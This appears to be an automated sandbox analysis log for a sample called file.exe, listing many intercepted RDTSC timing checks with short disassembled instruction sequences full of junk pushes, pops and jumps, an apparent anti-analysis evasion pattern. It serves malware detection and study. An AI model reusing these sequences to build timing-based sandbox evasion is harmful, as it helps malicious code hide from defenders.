              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233F2F second address: 1233F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007EFFACBF2F8Ah 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007EFFACBF2F92h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFFACBF2F8Dh 0x0000001d js 00007EFFACBF2F86h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B3C1 second address: 123B3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCB9 second address: 123BCBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCBF second address: 123BCD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCD7 second address: 123BCE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C2D9 second address: 123C2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD0h 0x00000009 popad 0x0000000a jo 00007EFFAC79DCCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C878 second address: 123C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F8Fh 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CB88 second address: 123CB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240BD0 second address: 1240BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240047 second address: 1240056 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007EFFAC79DCC6h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240351 second address: 1240372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F97h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240372 second address: 1240379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124063B second address: 1240646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240646 second address: 124064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124064A second address: 1240650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BE4A second address: 124BE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C3DF second address: 124C3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFFACBF2F86h 0x0000000a jl 00007EFFACBF2F86h 0x00000010 popad 0x00000011 pushad 0x00000012 je 00007EFFACBF2F86h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C3FF second address: 124C41A instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFFAC79DCC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCCDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D8F8 second address: 124D913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFFACBF2F86h 0x0000000a popad 0x0000000b jg 00007EFFACBF2F88h 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007EFFACBF2F96h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D913 second address: 124D93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCCAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D93C second address: 124D946 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFFACBF2F86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D946 second address: 124D94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D94C second address: 124D954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D954 second address: 124D958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B872 second address: 124B876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B876 second address: 124B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253B88 second address: 1253B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253B8C second address: 1253B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253B94 second address: 1253B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253B9A second address: 1253BA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259EF0 second address: 1259EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B4FF second address: 125B51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFFAC79DCC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007EFFAC79DCCBh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B51B second address: 125B51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B51F second address: 125B54A instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCD9h 0x00000011 jbe 00007EFFAC79DCC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12631B9 second address: 12631BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267113 second address: 126714A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD0h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFFAC79DCD3h 0x00000012 jmp 00007EFFAC79DCCCh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266CE4 second address: 1266CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266CEC second address: 1266CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266CF0 second address: 1266CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266CF4 second address: 1266D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007EFFAC79DCC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1266D07 second address: 1266D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007EFFACBF2F88h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269EE0 second address: 1269EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007EFFAC79DCC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269EF1 second address: 1269EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127330A second address: 1273310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278FA5 second address: 1278FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278FA9 second address: 1278FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278FAF second address: 1278FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F8Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282D66 second address: 1282D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282D87 second address: 1282D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282D8B second address: 1282D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282D91 second address: 1282D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282D97 second address: 1282DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007EFFAC79DCC6h 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282EE7 second address: 1282EED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282EED second address: 1282F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007EFFAC79DCC6h 0x0000000f jne 00007EFFAC79DCC6h 0x00000015 popad 0x00000016 jmp 00007EFFAC79DCD6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007EFFAC79DCCCh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1282F28 second address: 1282F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFFACBF2F86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1283064 second address: 1283080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007EFFAC79DCCFh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12831EC second address: 12831FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007EFFACBF2F86h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128334F second address: 1283363 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFAC79DCC6h 0x00000008 js 00007EFFAC79DCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1283363 second address: 1283369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1283369 second address: 128339E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFAC79DCC6h 0x00000008 jmp 00007EFFAC79DCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jnp 00007EFFAC79DCC6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12834DD second address: 12834E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFFACBF2F86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12834E8 second address: 12834F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFFAC79DCC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1284081 second address: 12840B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFFACBF2F92h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12840B0 second address: 128410B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007EFFAC79DCCEh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFFAC79DCD7h 0x0000001a popad 0x0000001b jmp 00007EFFAC79DCD8h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128410B second address: 1284110 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289B9A second address: 1289BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCCCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1289BAA second address: 1289BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1297BCE second address: 1297BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFFAC79DCE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A953F second address: 12A9558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007EFFACBF2F86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A969E second address: 12A96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C20E3 second address: 12C20FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007EFFACBF2F8Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C20FB second address: 12C20FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C20FF second address: 12C2109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFFACBF2F86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C227D second address: 12C2290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C1F second address: 12C2C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C28 second address: 12C2C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C2E second address: 12C2C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C70D4 second address: 12C7129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a ja 00007EFFAC79DCCCh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007EFFAC79DCC8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c xor dword ptr [ebp+1244A89Eh], esi 0x00000032 call 00007EFFAC79DCC9h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7129 second address: 12C7133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFFACBF2F86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7133 second address: 12C7137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7137 second address: 12C7170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007EFFACBF2F8Eh 0x0000000f jmp 00007EFFACBF2F97h 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7170 second address: 12C7174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7174 second address: 12C7178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C884C second address: 12C8869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFFAC79DCD7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0329 second address: 52B0355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0355 second address: 52B03B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007EFFAC79DCD1h 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007EFFAC79DCD3h 0x00000014 mov ebp, esp 0x00000016 jmp 00007EFFAC79DCD6h 0x0000001b mov edx, dword ptr [ebp+0Ch] 0x0000001e jmp 00007EFFAC79DCD0h 0x00000023 mov ecx, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03D0 second address: 52B03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03D6 second address: 52B03EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03EF second address: 52B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B03F3 second address: 52B03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E03B6 second address: 52E041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 call 00007EFFACBF2F98h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007EFFACBF2F97h 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007EFFACBF2F90h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E041E second address: 52E0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
